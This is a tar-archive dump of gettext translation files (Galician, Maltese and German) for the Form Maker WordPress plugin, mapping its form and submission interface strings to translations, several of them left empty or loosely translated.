#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "O seu correo-e de verificación expirou."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Ligazón de verificación non é válido."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "campo é necesario."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "Este non é un enderezo de correo electrónico válido."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"Non podes seleccionar ex datas. Seleccione unha data a partir da actual."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "O "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "valor debe estar entre "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "Cantidade "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "A súa puntuación debe ser inferior a "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Título"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "Primeira"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "Última"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Medio"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Código de área"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Número de teléfono"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "Dólares "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "Cents"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "A partir de"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "Para"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "ir "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "Restablecer "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Seleccione un campo "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Seleccione unha data"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-mt_MT.mo000060400000007323152434416630012220 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A

G
U

]
h
m
	u

�
*�
)�
�
�
	
	!+17?V_g{	��
��	�@�
,:P#TLx!����T
*e
3�
*�
6�
Q&*x��4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 17:01+0400
PO-Revision-Date: 2015-05-22 17:01+0400
Last-Translator: 
Language-Team: 
Language: mt
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
AprilKodiċi ŻonaAwwissuĊenteżmuBeltPajjiżDiċembruDollaruŻball, email ma ntbagħatx.Żball, fajl ma jistgħux jiġu mċaqalqa.Error, il-kodiċi tas-Sigurtà żbaljata.FrarEwwelMillgo JannarLuljuĠunjuL-aħħarMarzuMejjuNofsaniXejn ġiet sottomessa.NovembruOttubruNumru tat-telefown:Postali / Zip KodiċiKwantitàIrrisettja Agħżel DataAgħżel Qasam SettembruJiddispjacini, m'intix permess biex ittella dan it-tip tal-fajl.Stat / Provinċja / ReġjunIndirizz TriqIndirizz Triq Linja 2Il-Il-fajl jeċċedi-daqs permess ta 'Dan il-qasam %s teħtieġ dħul uniku u dan il-valur kien diġà sottomessa.Din mhix l-indirizz email validu.TitoluBiexLink verifika huwa invalidu.Inti ma tistax tagħżel id-dati ta 'qabel. Agħżel data tal-bidu minn dak attwali.Indirizz email tiegħek diġà verifikata.Email tiegħek tkun ġiet ivverifikata b'suċċess.Verifika email tiegħek tkun puntwali out.Formola tiegħek ġie negozjat b'suċċess sottomessa.Ip tiegħek hija lista sewda. Jekk jogħġbok ikkuntattja l-amministratur websajtPunteġġ tiegħek għandu jkun inqas minnqasam hija meħtieġa.valur għandha tkun bejnlanguages/form_maker-de_DE.po000060400000057116152434416630012150 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 16:52+0400\n"
"PO-Revision-Date: 2015-05-22 16:52+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: de\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Postanschrift"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Zusatz"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "Stadt"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Staat / Provinz / Region"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Postleitzahl"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "Land"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "Januar"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "Februar"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "März"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "April"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "Mai"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "Juni"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "Juli"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "August"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "September"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "Oktober"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "November"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "Dezember"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Fehler, falschen Sicherheitscode eingeben."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr ""
"Ihre IP wird die schwarze Liste gesetzt. Bitte kontaktieren Sie die Website-"
"Administrator. "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "Die Datei überschreitet die zulässige Größe von"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Leider sind Sie nicht berechtigt, diese Art von Datei hochzuladen."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Fehler, kann Datei nicht verschoben werden."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr ""
"Dieses Feld %s benötigt einen eindeutigen Eintrag und dieser Wert wurde "
"bereits eingereicht."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Fehler, E-Mail wurde nicht gesendet."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Nichts wurde eingereicht."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Das Formular wurde erfolgreich übermittelt."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Fehler, E-Mail wurde nicht gesendet."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Ihre E-Mail-Adresse ist bereits überprüft."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Ihre E-Mail wurde erfolgreich überprüft."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "Ihre E-Mail-Verifizierung ist abgelaufen."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Bestätigungs-Link ist ungültig."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
